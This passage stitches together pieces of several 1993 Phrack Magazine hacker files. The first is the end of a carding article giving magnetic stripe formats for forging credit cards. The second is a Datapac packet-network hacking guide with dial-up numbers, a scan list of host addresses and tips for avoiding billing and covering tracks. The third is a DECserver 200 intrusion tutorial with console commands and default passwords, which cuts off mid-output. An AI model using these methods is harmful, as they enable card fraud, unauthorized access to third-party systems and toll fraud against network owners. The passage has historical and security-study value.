cards with a magnetic stripe writer. A certain group did this for EIGHT years, before getting caught. This is worth a whole article to itself, but I'll just go over some guidelines. Track I is 210 bpi. Track II is 75 bpi. The next chart shows the Magnetic Stripe Data Format (Track I) Field # Length Name of Field ------- ------ ------------- 1 1 Start Sentinel (STX) 2 1 Format Code 3 13/16 Primary Account Number 4 1 Separator (^) HEX 5E 5 2-26 Card Holder Name 6 1 Separator (^) HEX 5E 7 4 Card Expiration in format MMYY 8 3 Service Code (?) 000 WORKS. 9 0/5 Pin Verification Field 10 Discretionary Data Depends on 3, 5, 9 11 11 Visa Reserved Always last 11 positions 12 1 End Sentinel (ETX) 13 1 LRC Maximum Record Length is 79 Characters The next chart shows the Magnetic Stripe Data Format (Track II) Field # Length Name of Field ------- ------ ------------- 1 1 Start Sentinel (STX) 2 13/16 Primary Account Number 3 1 Separator (=) HEX 3D 4 4 Card Expiration Date in format MMYY 5 3 Service Code (?) 000 works. 6 0/5 Pin Verification Field 7 Discretionary Data Depends on 2, 6 8 1 End Sentinel (ETX) 9 1 LRC "The LRC is calculated by performing a BITWISE XOR (Exclusive OR) on all ASCII values of the characters in the Inquiry - EXCLUDING the but INCLUDING the ." is HEX 02. is HEX 03. By the way, for my last article, "TTY SPOOFING", check Phrack 41 File 8. ***** MANY thanks go out to my friends, of whom I won't mention because of the delicacy of this topic. I appreciate them sharing their knowledge with me, and I feel I'm kind of returning the favor by writing this article. Thanks also go out to the Phrack Staff, both past and present for putting out an excellent magazine, and continuing to distribute information to the computer underground. ***** Happy Hacking and Safe Carding! VaxBuster '93 ==Phrack Magazine== Volume Four, Issue Forty-Four, File 21 of 27 **************************************************************************** ************************************************ / DataPac \ / Synapse 403 \ / \ ******************************************************** All of us I am sure have read penultimate files on the workings of Tymnet or in some cases Sprintnet. These are staples in a hacker's diet. In fact any second rate "underground" BBS has complete sections on BT North America and the nets available therein. However one such net you will most likely see very little on, is Datapac. Datapac was originated in the late seventies by Telecom Canada, a large partnership of Telcos and businesses interested in high speed data transfers between Business & Government systems which would be hassle free and cheaper in the long run. (The birth of most PSN's really.) The significance of Datapac however is that it has changed very little by way of security in the past ten years, although it has extended access to most of the globe in one fashion or another. Datapac is not only a hacker's utopia due to lax (in some cases non-existant) security; it is also, for the most part, safe ground (this term is, of course, used somewhat lightly) for beginners and the unsure to try their luck/skill at the game of packet switched network hacking. The Datapac net is most important to Canadian Hackers who have direct access to it, and therefore (if you're lucky) direct access to the world. A list of dial-up ports in Canada follows. CITY (PROVINCE) DIAL NUMBER (SPEED 2400) DIAL NUMBER (SPEED 9600) =============== ======================== ======================== (TOLL FREE-CANADA) 800-565-8805 Abbotsford (BC) 604-855-3632 Banff-Canmore(ALTA) 403-762-5603 Barrie (ONT) 705-721-2411 705-726-0168 Bathurst (NB) 506-548-8658 506-548-9837 Belleville (ONT) 613-969-1161 Brampton (ONT) 416-796-3808 Brantford (ONT) 519-758-0058 Brockville (ONT) 613-345-7550 613-498-0676 Calgary (ALTA) 403-263-5021 403-265-4081 Campbell River (BC) 604-287-9166 604-286-9800 Chatham (ONT) 519-351-8950 Chicoutimi - Jonqui (QUE) 418-543-8013 418-543-8512 Chilliwack (BC) 604-792-5218 Clarkson (ONT) 416-823-6010 Cornerbrook (NFLD) 709-634-9060 709-634-8406 Cornwall (ONT) 613-936-9145 Courtenay/Comox (BC) 604-334-9846 Dawson Creek (BC) 604-782-8549 Drayton Valley 403-542-2300 Drummondville (QUE) 819-478-1741 Duncan (BC) 604-746-8241 Edmonton (ALTA) 403-421-1428 403-429-2492 Edmundston (NB) 506-735-8809 Fort McMurray (ALTA) 403-790-2300 Fort St John (BC) 604-787-8402 Fredericton (NB) 506-459-2792 506-453-0754 Granby (QUE) 514-375-9666 Grand Centre (ALTA) 403-594-2636 Grande Prairie (ALTA) 403-532-4533 Guelph (ONT) 519-763-3610 519-763-1280 Halifax (NS) 902-453-9100 902-453-2666 Hamilton (ONT) 416-523-6948 416-523-6855 Kingston (ONT) 613-546-0039 613-546-5764 Kitchener (ONT) 519-741-4000 519-741-1499 Lethbridge (ALTA) 403-320-6200 Lindsay (ONT) 705-328-2941 Lloydminster (ALTA) 403-875-8069 London (ONT) 519-432-2710 519-432-7101 Medicine Hat (ALTA) 403-528-3445 Moncton (NB) 506-856-5196 506-383-7780 Montreal (QUE) 514-861-4750 514-845-6014 Nanaimo (BC) 604-741-1552 Nelson (BC) 604-352-9258 New Glasgow (NS) 902-755-4594 North Bay (Ont) 705-495-4720 Oshawa (ONT) 416-404-0596 Ottawa (ONT) 613-567-4552 613-563-7658 Peace River (ALTA) 403-624-1165 Penticton (BC) 604-490-0251 Port Alberni (BC) 604-723-6178 Port Hardy (BC) 604-949-8973 Powell River (BC) 604-485-9646 Prince George (BC) 604-561-9178 604-564-8953 Prince Rupert (BC) 604-627-8937 Quebec City (QUE) 418-647-2421 418-648-2611 Quesnel (BC) 604-992-3854 Red Deer (ALTA) 403-341-4033 Regina (SASK) 306-525-8760 306-347-9073 Rimouski (QUE) 418-725-3620 Sault St-Marie (ONT) 705-942-7030 Sarnia (ONT) 519-339-9144 519-337-4727 Saskatoon (SASK) 306-934-9100 306-665-1046 Sherbrooke (QUE) 819-564-6417 819-829-1146 Smithers (BC) 604-847-9173 St Catherines (ONT) 416-687-3340 416-688-3433 St. Jerome 514-565-6552 St John's (NFLD) 709-739-1499 709-739-6931 St Johns (NB) 506-633-1021 506-652-1482 Ste Hyacinthe (QUE) 514-774-0720 Sydney (NS) 902-562-8224 Terrace (BC) 604-638-8596 Toronto (ONT) 416-979-1232 416-979-1251 Trois Rivieres (QUE) 819-373-9983 819-373-9070 Truro (NS) 902-893-5434 Valleyfield (QUE) 514-377-2114 Vancouver (BC) 604-662-8747 604-662-7865 Victoria (BC) 604-380-3874 604-360-2673 Whistler (BC) 604-932-8927 William Lake (BC) 604-398-8632 Windsor (ONT) 519-973-1086 519-973-4633 Winnipeg (MAN) 204-947-6797 204-453-6099 Connecting and Addressing Once connected you will need to type one or three periods and a carriage return, this will produce a numerical format denoting your port address and node, XXXX XXXX PORT Address-----------^ ^ NODE number-----------------^ Once this is established the network simply sits and waits for you to spit commands at it, in other words an address to whence you would like to travel. Failing this, idle time will have you disconnected, the time varies but averages around 1 or 2 minutes. The formatting of a Datapac address is really quite simple and is most often 8 digits long (sometimes ten but we'll get to that later) The first four (the prefix) specify the current location in Canada, for instance large cities will have several, just as they will have more than one prefix in the phone directories. The last four digits are arbitrary, and correspond to the host number. An address with ten numbers as opposed to eight (ie: xxxx xxxx xx) is utilizing a subaddress. Quite often these machines will be independent of a cluster of nodes and there only to fulfill one task. Also they may simply be segregated machines for no apparent reason at all (except to make scans a bitch :>). Quite often you will find that subsystems work as a PAD or PAC allowing you re-enter the Dpac from a host level, therefore allowing you to make use of the company's inherent NUI and connect to other places on the Dpac that disallow collect calls. Connecting to Machines on the Dpac Datapac, like most networks, uses NUIs (Network User ID) which keep accounting for all billed connections. HOWEVER a great deal of machines on the Dpac allow for collect calls from within the network. Yet if you have a valid NUI you may connect to ANY machine hooked up to the Dpac (except those which are part of a closed user group). I have found that it is best to PAD hop and avoid the whole NUI problem entirely. The following a list of connection messages and their explanations for inter-network calls. MESSAGE EXPLANATION ------- ----------- Call connected to: XXXXXXXX A virtual circuit has been established between an originating DTE and a remote (receiving) DTE. Hunted The remote logical channel is part of a hunt group. Backed Up The call attempt to the remote DTE has failed. The network has re-directed the call to another predetermined DTE that has been optioned as backup. I The call has been placed to an international address. P Priority service. Packet size: 128. N Normal service. Packet size: 128 or 256. DNA Data Network Address of the originating DTE. LCN Logical Channel Number of the recipient DTE. NUI The call will be billed to the 6 to 8 character Network User Identifier. CUG The recipient DTE is part of a closed user group. Reverse Charge The recipient DTE has accepted the charge associated With the established call. These reactions apply to any calls made that are not "international" I will list the connect reactions for international calls in the following section. DATAPAC INTERNATIONAL ACCESS PROCEDURES --------------------------------------- Datapac International provides outgoing and incoming access to 6 U.S. based Networks and to over 100 packet-switched networks around the world. To successfully complete such calls, Datapac has implemented the International CCITT X.75 procedures and X.121 International numbering plan. Thus, the Datapac user originating an international call must use the following format: (1) (DNIC) (FOREIGN ADDRESS) : : : One defines the Datapac International.: : : Prefix. : : : : Packet networks are identified by a ........: : four digit number called a DNIC : (data network identification code) : : The foreign national address is .......................: expressed as an eight to ten digit address. Here is a list of useful DNIC's if you get the urge to scan "other" networks. Sprintnet 3110 Bell South 3143 Centel 3148 BT Tymnet 3106 Accunet 3134 NYNEX 3144 U.S. West 3147 ADP Autonet 3126 Fedex 3138 Express 3139 If you are scanning (which I assume you might be) you will encounter a great many cryptic messages. So many, in fact, I am sure you will loose count. Some are worth mentioning some are not but here a few you might encounter. CALL CLEARED -- A network problem within Datapac TEMPORARY NETWORK or a foreign network prevents either PROBLEM (XXY) the requested call from being established or the established call from being continued. Try again later. CALL CLEARED -- Either the foreign network requested is not ADDRESS NOT IN accessible from Datapac, or the foreign SERVICE (XXY) network address specified identifies a non-existent destination, i.e., the address is not yet assigned or no longer assigned. Verify with destination that the foreign network is accessible from Datapac and that the foreign network address is assigned. CALL CLEARED -- The calling terminal is not permitted to ACCESS BARRED establish an international call to the (XXY) called destination address because of a closed user group violation. Verify network address with destination. CALL CLEARED -- Either the foreign network or the COLLECT CALL destination address is not willing to REFUSED (XXY) accept the collect calls. Verify the call establishment procedures with destination. CALL CLEARED -- The Call Request is considered invalid INCOMPATIBLE by the foreign network mainly because of CALL OPTIONS the incorrect number of digits in the (XXY) foreign network address. Verify foreign network address with destination. CALL CLEARED -- The destination is out of order, possibly DESTINATION NOT because the destination's network access RESPONDING (XXY) link is inoperative. Try again later and verify with destination. CALL CLEARED -- The destination address called is fully DESTINATION BUSY engaged (no logical channels available) (XXY) and cannot accept another call at this time. Try again later. CALL CLEARED -- This message indicates a protocol error at REMOTE PROCEDURE the remote DTE interface. Check with remote ERROR (XXY) DTE (destination). Outdials on Dpac On most Dpac dialups there are also dialouts, however to use them you must either be calling from a Host on the Dpac or have a public access NUI. The latter tends to be more difficult to get than the former. A list of addresses for dialouts is available at 9210 0086 (the Datapac help center), however it is OLD and therefore somewhat inaccurate so I have not included it. Also you will find that a majority of the dialouts are of the low baud rate variety, however there are a few 19.2 dialouts as well. While dialouts are quite often a pain in the ass to access, all hope is not lost. Many of the machines you encounter on Dpac are LATservers, Gandalfs, System/370s, etc. with dialouts. I have found more than a few that are COMPLETELY un-passworded with Global access dialouts. Beyond all this, Dpac can also be very useful for covering your tracks while attempting to perform digital voyeurism on other networks like Sprintnet, Tymnet, etc. It may mean that you have less leeway but it still makes the target site go through a bit more difficulty in tracking you down. In closing this, I am leaving a scan through which you can get familiar with Dpac. It is far from complete as a guide to Datapac, but lists many of the systems I have found that accept collect calls. I will first list prefixes and the areas they represent. If you are looking a decent Datapac Scanner you can get one at 403-283-5519, while this is not a public system, it will allow guest users to log on and transfer a scanner made for Procomm for Windows Partial Datapac Prefix List =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Calgary (ALTA) 6330 | Clarkson (ONT) 9190 Edmonton (ALTA) 5870 | Halifax (NS) 7610 Hamilton (ONT) 3850 | Kitchener (ONT) 3340 London (ONT) 3560 | Montreal (QUE) 8270 Ottawa (ONT) 8570 | Quebec City (QUE) 4840 Regina (SASK) 7210 | St-John's (NB) 7460 Saskatoon (SASK) 7110 | St. John (NFLD) 7810 Toronto (ONT) 9160 | Vancouver (BC) 6710 Windsor (ONT) 2950 | Winnipeg (MAN) 6920 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Scan List -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- <] NUA [> <] Service Name [> ($ = Refused Collect Connection) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 20100071 $ VM/SP 20200115 VAX/VMS 20200116 VAX/VMS 20200156 Diand Information System 20200214 $ UNIX (gtagmhs2) 20200230 METS Dial-In Server Enter your login name: 2020024098 Control Port on Node Ottawa 6505 PAD 20200286 $ VAX/VMS 2020032099 MPX.25102: PASSWORD 20200321 SunOS Rel 4.1.3 (X25) 20200322 SunOS "" 20200330 INETCO Magicbank 20200342 :: 20200497 VAX/VMS 202005421 $ VAX/VMS 20200548 SunOS Rel 4.1.3 (TMS470) 20200582 $ VAX/VMS Production System 20200586 ULTRIX v4.2 (fcsa) 20200600 $ User Id/Usager: 20200602 $ UNIX (gtagmhs) 20400011 $ VM/SP BNRCEN 20400089 XMUX node: 320QUEEN 20400157 HP3000 IDRC/CDRI/CIID: 20400177 QL * IDENTIFIEZ-VOUS SVP * PLEASE SIGN ON: 2040017777 GST Questions & Answers by Revenue Canada 20400180 XMUX node: STORE305 20400205 VAX/VMS 20400210 VMS/VAX 20400249 UNIX 20400268 $ VAX/VMS 20400407 $ VAX/VMS 20400459 MHP1201I TERMINAL CONNECTED TO PACKET/74 20400470 ISM/TSO READY TO HOST 20400478 HP3000 20400484 VAX/VMS 20400529 $ XMUX node: SMITHFLD 20400642 CDCNET 20400683 PACX (user interface) 20400712 UNIVERSITY OF OTTAWA 20400860 VAX/VMS 20401313 Network 20401375 DATAPAC: DOT SYSTEM READY 20500011 VM/SP Canada Institute for Scientific & Tech Info 20500036 enter v for vtam (roscoe or tso) d for dobis 20500047 $ # 20600029 SCO domus1 SCO v/386 20600222 Please enter password 20700038 $ VAX/VMS 20700040 Enter profile ID: 20700053 NODE 57206798 (looks like an iNet2000?) 20700122 XMUX node: OTTAWA 20700157 UNIX "" 20700187 $ VAX/VMS Canada Centre for Remote Sensing Satellite Op. 20700194 iNet2000 20700195 iNet2000 20700201 $ HP3000 Supply & Services Canada 20700326 DATAPAC : NBA SYSTEM READY 20700416 Operator Code: 20700439 UNIX (bcm_kernel) 20700471 ISM (7/E/1) ISM Systems Corp/Ottawa Processing 20700538 XMUX node: TMIXMUX0 20700539 XMUX node: TMIXMUX1 20700540 XMUX node: TMIXMUX2 20700541 UNIX 20700561 20700591 Canadian Intl. Development Agency's BBS(CIDA) 20700596 UNIX Zoomit 20700603 VAX/VMS 20700611 $ DIAND INFO SYSTEM. ENTER SERVICE NAME 20700615 SCO OD Statsys1 20700616 $ UNIX gateway!login: 20700617 UNIX Zoomit 20700652 UNIX 20700665 $ NC-PASS 20700666 $ NC-PASS 20700718 OBS Online Services (WYLBUR) 20700728 VAX/VMS 20700740 UNIX 20700741 VAX/VMS 20800015 VAX/VMS 20800033 VAX/VMS v5.5-1 20800043 $ DIAND Info System - INAC. Sioux Lookout. 20800095 TSO 20800187 VAX/VMS FCSA System VAX/VMS 4.2 21200014 CDCNET 21200030 $ PACX 21300047 Please Enter Password 21600001 :: 21700054 VAX/VMS 21700073 :: 22100034 HP3000 Burgess Wholesale Foods MPE/XL -Kingston 22100138 INT NET Enter SecurID Passcode: 22100188 VAX/VMS 22400041 XMUX node: BELLEVIL 22600049 SERVICE ID= 22700017 VAX/VMS 23400121 $ UNIX orillia x25 23600035 VAX/VMS Micro VAX 3100 / VMS 5.5 23800176 VAX/VMS v5.5-1 23800236 XMUX node: OTTAWA 23800343 node 57216d65 (looks like an iNet2000) 23800451 $ VAX/VMS Certification System 23800491 UNIX X.29 Terminal Service 23800505 ONLINE SERVICES(WYLBUR) ENTER USER ID- 23800507 "" "" 23800594 ENTER FUNCTION:(Fisheries & Oceans Canada) 23800599 XMUX node: MUX8 23800684 VAX/VMS INFOMART ONLINE 23800685 VAX/VMS INFOMART ONLINE 23800700 SCO OD vmabs SCO Open Desktop 24300084 VAX/VMS v5.5 24300149 XMUX node: SAULTE 24400061 SERVICE ID= 24400096 DATAPAC : SUD SYSTEM READY 24400146 HP3000 PROD.MULTICAR.SUDBURY MPE XL 24700021 SERVICE ID= 24900011 VAX/VMS INFOMART ONLINE 24900024 ISM (7/E/1) ISM Systems Corp. Ottawa Proc. Centre 24900040 VAX/VMS 24900057 ISM 24900099 PACX Gandalf Access Server 25200014 TAL TORONTO 25200017 VM/SP 25200054 XMUX node: TORONTO 25200214 ISM GUARDIAN INSURANCE - ENTER SYSTEM 25200258 :: 25700031 > 25700057 VAX/VMS 26100091 VAX/VMS 28300080 VAX/VMS 28300083 XMUX node: XMUX1 28300092 INETCO 28300154 VAX/VMS 28700014 VAX/VMS 28700029 SERVICE ID= 28700030 LEVITT SAFETY / THUNDER BAY 29200013 VAX/VMS 29300045 $ VAX/VMS 29400052 Compuserve 29400172 VAX/VMS 29400176 Enter System Id: 29400254 XMUX node: WINDSOR 29400263 ISM CDNC 29400264 ISM CDNC 29500009 $ Datapac Public OD 29500071 $ "" 29500072 $ "" 29500073 $ "" 29500074 $ "" 29500075 $ "" 29500092 :: 29500137 :: 29500139 PRIMOS 23.3.0 INTENG 29500166 $ Datapac Public OD 29500167 $ "" 29500168 $ "" 29500900 $ "" 29500901 $ "" 29600018 PRIMOS v23 FAXON 29600136 KMUX GANDALF KMUX PWORD> 2960075101 INETCO Polystar E.C.U 30500153 AXA Canada Data Center(PACKET/74) 31500065 SCO OD isgsys1 SCO Open Desktop 2.0 31500076 $ PACX UWO Computing & Communications Services 315000767 XMUX node: CCSMUX1 31500083 XMUX node: LONDON 31500225 SCO OD isg2 SCO Open Desktop 2.0 31500490 XMUX node: LONDON 31500528 XMUX node: SARNIA 31500607 PRIMOS 23.3.0.R20 WPPENG 31500726 UNIX ADC T-SENTRY 31500787 XMUX node: BUNTINRI 31500838 MHP201A DTPAC06L VER 7.0.3 APPLICATION: 32400014 XMUX node: LONDON 32400016 ISP-LOGON-CHRISTIE 32400067 $ VM/SP 32400107 PRIMOS 22.1.2.R38 HUNT 32400122 " "" 32500023 XMUX node: LONDON1 32500053 XMUX node: 074 32500099 XMUX node: WIND 32500149 enter passcode: 32500202 VAX/VMS W.R.C.S.S.B 32500225 VAX/VMS London system A - Boot Node - MicroVMS v4.7 32500239 VAX/VMS 32500274 VAX/VMS 32500345 $ MHP1201I TERMINAL CONNECTED TO PACKET/74 32500367 XMUX node: WINDSOR 32500369 UNIX 32500383 XMUX node: STERLING 325003833 BOSX/DPX (RISC?) Sterling Marking Products Inc. 32500386 5251 Controller emulator - v.191 Password: 32500396 VAX/VMS MicroVMS 5.3-1 32500406 VAX/VMS MicroVMS 5.3-1 32500523 SERVICE ID= 32500680 XMUX node: WINDSOR 32500692 XMUX node: WINDSOR 32500713 XMUX node: STTHOMAS 32500850 DATAPAC: WII SYSTEM READY 32600052 Compuserve 32600056 PRIMOS 22.1.2.R3 PBTOOL 32600243 VAX/VMS 33400115 SERVICE ID= 33400223 Adjusters Canada Inc. Please enter X25 Security 33400246 PRIMOS 22.0.3.R37 BLTCAD 33400306 $ Datapac Public OD 33400337 $ "" 33400344 $ "" 33400345 $ "" 33400346 $ "" 33400347 $ "" 33400348 $ "" 33400349 $ "" 33400521 ISM 33400550 ULTRIX 33400589 $ Datapac Public OD 33400590 $ "" 33400591 $ "" 33400609 ISM 33400630 PRIMOS 22.1.3 THOR Engle Canada 33400672 UNIX 192.9.200.1 334006723 MACHINE (XMUX machine) 33400694 Sim3278 33400703 UNIX AT&T SV - WLU 3340070399 MPX.25102: PASSWORD 33400892 ===> 33400900 $ Datapac Public OD 33400901 $ "" 33401149 XMUX node: KITCH 33401414 Datapac Public OD 33401415 "" 33401453 DYNIX SpaeNaur SVR4 33401462 Datapac Public OD 33401475 Chase IoLan Terminal Server 334014751 XMUX node: WATERLOO 33401528 UNIX 33401537 Sim3278 33500021 JMS Online Service. Please enter ID: 33500033 $ ENTER LOGON REQUEST 33500081 JMS Administator line. Enter SYSTEM or SERVICE. 33500099 " " 33500110 XMUX node: WATERLOO 33500136 Wilfrid Laurier University x.25 PAD 33500142 Prudential Assurance / Kitchener 33500196 University of Waterloo online Library 33700015 PICK 33700115 STARMASTER Agriculture Canada Ontario Regional Com. Cent. 33700133 XMUX node: 362 33700216 XMUX node: 767 33700236 VAX/VMS Wellington Country Roman Catholic School Board 33700238 VAX/VMS 33700345 VAX/VMS 33700346 $ HP3000DTC Enter DTC port password: 33700348 DATAPAC : KIT SYSTEM READY 33700349 $ ZAM0001 33700376 $ VAX/VMS Ontario College Application Service 33700393 :: 33700465 ISM NET-PASS NPA MAGIC 34100013 VAX/VMS 34200139 SERVICE ID= 35100010 $ VAX/VMS 35500179 PICK WELCOME TO HAC INFO NETWORK 35600110 $ Datapac Public OD 35600158 UNIX 3x3 35600273 DEVELNET University/Hospital Network 35600900 $ Datapac Public OD 35600901 $ "" 36200027 MHP201A U0000053 Ver 7.0.5 APPLICATION: 36700021 USER NUMBER -- 36700026 VAX/VMS 36700030 USER NUMBER -- 36700038 $ UNIX 36700059 QINTER 36700115 OCC System 36700126 SERVICE ID= 36700172 SAFEGUARD 2> 36700183 XMUX node: DP01 36700184 XMUX node: DP02 36700185 HP3000 36700369 NETWORK CONTROL 36700372 SAFEGUARD 4> 36700381 Sim3278 36700382 Sim3278 37200020 VAX/VMS 37500014 VAX/VMS 37600014 SERVICE ID= 37600020 HP3000 HP900.HCB.CANADA MPE/XL 37600027 MHP1201I TERMINAL CONNECTED TO PACKET/400 37600029 XMUX node: HAMILTON 37600044 $ ISM SCC INTERACTIVE SERVICES 37600066 MHP1201I TERMINAL CONNECTED TO 4.15 PACKET/74 37600152 XMUX node: HAMILTON 37600166 XMUX node: BUTLER 37600176 XMUX node: DISCOUNT 38300083 VAX/VMS 38500079 $ TANGRAM ARBITER LU1 38500085 HCH Magic 38500122 PACX CCINFO 38500150 $ Datapac Public OD 38500151 $ "" 38500152 $ "" 38500153 $ "" 38500154 $ "" 38500163 $ "" 38500164 $ "" 38500165 $ "" 38500198 $ "" 38500200 $ "" 38500201 $ "" 38500202 $ "" 38500203 $ "" 38500204 $ "" 38500205 $ "" 38500226 XMUX node: (no node name) 38500262 Please enter your operator number 38500329 # 38500356 PACX CCINFO 38500399 SERVICE ID= 38500400 :: 38500431 VAX/VMS 38500586 VAX/VMS MicroVMS v5.3 38500891 VAX/VMS 38500900 $ Datapac Public OD 38500901 $ "" 38501019 XMUX node: WELLAND 38501149 XMUX node: CPNWRI 38501151 VAX/VMS 38501155 DATAPAC : BUR SYSTEM READY 38501175 CDCNET 38501194 VAX/VMS AEG Electrocom CDN_CECO V25.3 38700015 VAX/VMS BURCOM - MicroVAX ][ - MSB 38700022 XMUX node: RBURL 38700048 PRIMOS 20.2.6 SYSD 38700068 $ Bailey Controls Canada 38700119 :: 38700127 XMUX node: STORE031 38700132 XMUX node: LIMRIDGE 38700152 PRIMOS 20.2.6 SYSF 38700153 PRIMOS 20.2.6 SYSL 38700155 XGATE: 38700162 XMUX node: QUEENSTN 38700261 XMUX node: HAMILTON 38700262 XMUX node: FORTERIE 38700426 XMUX node: HAM 38700583 XMUX node: DISCNT2 38700629 XMUX node: NIAGARA 39100017 MERLIN SYSTEM 2 39100019 MERLIN "" 39100020 MERLIN "" 39100041 Id: LU:Z0068 39100043 Id: LU:Z0070 39100044 Id: LU:Z0077 39100045 Id: LU:Z0078 39100049 Green Line Investor Services 39100057 VAX/VMS Burns Fry Analytics Inc. Fixed Income Research 39100077 Toronto Public Library 391000775 XMUX node: TPL 39100092 INT/UNIX system name: cirus 2 INTERACTIVE SYSTEMS CORP. 39100146 XMUX node: STORE088 39100200 iNet2000 39100234 VAX/VMS Burns Fry Ltd. MicroVAX 3800 39100395 HP3000 39100498 STARMASTER 39100503 MERLIN SYSTEM 2 39100566 STARMASTER NORBORD Industries 39100566 Console 39100581 AOS/VS 39400100 iNet2000 39400101 iNet2000 39500032 INFOGLOBE DATABASE--PLEASE SIGN ON 39500032 Globe & Mail 40100012 PACX U.C.G. PACX 2000 41100043 Infoglobe 41100045 Interactive UNIX 41100054 Green Line Investor System 41100065 Imprimerie Quebec 41100301 Prime Net 41100656 Lotus CSG 41100681 ?? 43900170 ECHO System 55500010 French? 59100088 U Of A 3000 System 59100092 Keyano College-Alberta 59100099 VMS/VAX 60100010 U of Alberta 62400440 UNIX 2000 System 62600009 Private Network 62600045 62600046 Service Id: 66600062 Van-Reg 66600180 ?? 67100752 User Name? 67101408 ?? 67101700 Cloverdale Paint 67101802 VMS/VAX 69100018 CYBERSHARE 69100376 VMS/VAX 69200032 Lucky (VMS/VAX) 69200239 Environment Winnepeg 69200343 User Id: 70300066 Brandon University 72100315 SPMC (VMS/VAX) 72100465 MCR 72101002 VMS/VAX 72101058 SPECIFY APPLICATION DESIRED 72101109 Information System Management 72400014 Max Daisley System (VMS/VAX) 72400100 Envoy 72400101 Envoy 78100092 VMS/VAX 78100209 VMS/VAX 78100265 VMS/VAX 78100476 Hewlett Packard System 78100876 DYNIX S6000 78101097 VMS/VAX 79400100 Envoy 84400095 Profits 84400237 Service Id: 84400312 GEnie Network 84400513 SuperDOS 84400526 BNF: DATAPAC SYSTEM READY 84400571 Daily Oil & Associates BBS 84800410 VMS/VAX 84800535 CAS: DATAPAC 84800700 VMS/VAX 84800728 %XGATE 84800784 XENIX System 84800829 Alberta Wheat Pool 84800888 ALLSTATE (VMS/VAX) 91100014 Gandalf System - Canadian Facts 91100174 VMS/VAX 91100482 Grassroots System (Special Emul. Needed) 92100086 DATAPAC Information 93200233 UM-Net -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ==Phrack Magazine== Volume Four, Issue Forty-Four, File 22 of 27 **************************************************************************** -- An Introduction to the DECserver 200 -- by Opticon The Disassembled ANARCHY: "The belief that society can be maintained without prisons, armies, police or other organized force to maintain property rights, collect taxes or enforce such personal obligations as debts, contracts or alimony." -EB 1966, vol.I (taken from the Phrozen Realm) "If ur good, nobody knows that ur there" The DECserver is a terminal server (WOW!). The Model 200 is the most commonly found server in VMS machines. This device connects up to eight asynchronous (RS232C) terminals to one or more hosts available on an Ethernet Local Area Network. It is connected to the LAN through an Ethernet physical channel and supports speeds up to 19.200bps. It can be found on VAXes, mVAXes and VAXstations. It uses the Local Area Transport protocol to communicate with the other nodes. It also implements the Terminal Device/Session Management Protocol to achieve multiple sessions. Things that can be found plugged on it include dial-in and out modems, terminals, printers and stuff like that. The identification code for it in VMS is DS2. It's software is installed via VMSINSTAL.COM to SYS$SYSROOT:[DECSERVER] or in SYS$COMMON:[DECSERVER] for the cluster machines. And of course now you will ask why should you be interested in a damn phucking (=relief, back to my native language) SERVER. A lot of interesting things can be done, like dialing out for free (assuming you can connect to it in a convenient way). You can even find a DEC server 200 dedicated to eight high speed modems. There is no need to say that you need privileges to phuck up with devices like that...or there is? ..Set Default to SYS$SYSROOT:[DECSERVER] and run DSVCONFIG.COM : $ $ set default sys$sysroot:[decserver] $ show default SYS$SYSROOT:[DECSERVER] = SYS$SYSROOT:[DECSERVER] = SYS$COMMON:[DECSERVER] $ @dsvconfig You must assign a unique DECnet node name and DECnet node address for each new DECserver. Press to start, or to exit... D E C s e r v e r C o n f i g u r a t i o n P r o c e d u r e Version: V1.7 Menu of Options 1 - List known DECservers 2 - Add a DECserver 3 - Swap an existing DECserver 4 - Delete an existing DECserver 5 - Restore existing DECservers CTRL/Z - Exit from this procedure Your selection? 1 DECnet DECnet Server Service Address Name Type Circuit Ethernet Address Load File Dump File ------- ------ ----- ------- ----------------- ------------- ------------- 1.1 KEYWAY DS200 BNA-0 08-00-2B-07-39-5E PR0801ENG.SYS DS2KEYWAY.DMP 1.2 REVEAL DS200 BNA-0 08-00-2B-28-32-CB PR0801ENG.SYS DS2REVEAL.DMP 1.3 OASIS DS200 BNA-0 08-00-2B-26-A9-57 PR0801ENG.SYS DS2OASIS.DMP 1.4 PAWN DS200 BNA-0 08-00-2B-24-F3-98 PR0801ENG.SYS DS2PAWN.DMP 1.5 OPAQUE DS200 BNA-0 08-00-2B-11-EA-D4 PR0801ENG.SYS DS2OPAQUE.DMP 1.6 TOKEN DS200 BNA-0 08-00-2B-10-64-98 PR0801ENG.SYS DS2TOKEN.DMP 1.7 KERNEL DS200 BNA-0 08-00-2B-12-D6-39 PR0801ENG.SYS DS2KERNEL.DMP 1.8 IRIS DS200 BNA-0 08-00-2B-12-D6-39 PR0801ENG.SYS DS2IRIS.DMP 1.9 NEBULA DS200 BNA-0 08-00-2B-12-D6-39 PR0801ENG.SYS DS2NEBULA.DMP Total of 9 DECservers defined. (Press RETURN for menu) Connecting to one of them: $ mc ncp connect node iris Console connected (press CTRL/D when finished) # Here you must give a password. The default one is usually working so try "access". Only in "high security" systems they change the default password, because privileges are needed anyway to access the Network Control Program (which can be a possible subject for my next article). But since you are in using a system account (..privileged) you can change the current password if you find any good reason for doing so. More on that later. DECserver 200 Terminal Server V3.0 (BL33) - LAT V5.1 Please type HELP if you need assistance Enter username> You are in. In the DECserver there are Permanent and Operational databases. The permanent database holds commands which affect the device permanently when you log out. In the Operational database whatever you do is temporary and takes effect only for the time you are logged in. Let's go on by trying to get the default privileged account which enables you to view various things and make changes other than the normal ones. Local> set privileged Password> system Again the default password should work. Local> show hosts Service Name Status Identification VMS 1 Connected Welcome to VAX/VMS V5.4-2 MODEM Available Dial In And Out UNIX Available BSD Local> show nodes Node Name Status Identification VMS 1 Connected Welcome to VAX/VMS V5.4-2 UNIX Reachable BSD IRIS Reachable Local> show services Service Name Status Identification VMS 1 Connected Welcome to VAX/VMS V5.4-2 MODEM Available Dial In And Out UNIX Available BSD (RISC) Local> show users Port Username Status Service 1 anything Connected VMS Local> show sessions (it'll display YOUR sessions) Port 1: anything 